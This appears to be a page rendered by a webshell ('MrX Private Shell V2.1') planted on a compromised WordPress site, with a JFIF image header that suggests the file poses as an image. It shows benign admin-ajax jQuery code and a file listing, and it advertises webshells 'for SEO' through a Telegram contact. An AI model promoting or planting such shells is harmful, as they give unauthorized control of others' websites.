����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
jQuery(document).ready(function($) {
$('.button-primary').click(function(e){
var data = {
action: 'my_action',
whatever: 1234
};
// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
$.post(ajaxurl, data, function(response) {
alert('Got this from the server: ' + response);
});
e.preventDefault();
});
/*
ajax({
url: "http://localhost/ac/acne/wp-admin/admin-ajax.php",
type: "POST",
data: {
action: "update_button",
button: $( this ).val()
}
});
$( "form" ).on( "submit", function(e) {
var dataString = $(this).serialize();
//alert(dataString); return false;
$.ajax({
type: "POST",
whatever: 1234,
url: "http://localhost/ac/acne/wp-admin/admin-ajax.php",
data: dataString,
success: function () {
$("#contact_form").html("<div id='message'></div>");
$("#message")
.html("<h2>Contact Form Submitted!</h2>")
.append("<p>We will be in touch soon.</p>")
.hide()
.fadeIn(1500, function () {
$("#message").append(
"Saved hahaha"
);
});
}
});
e.preventDefault();
});
*/
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| save-button.js | File | 1.42 KB | 0644 |
|
| settings-adm.js | File | 11.2 KB | 0644 |
|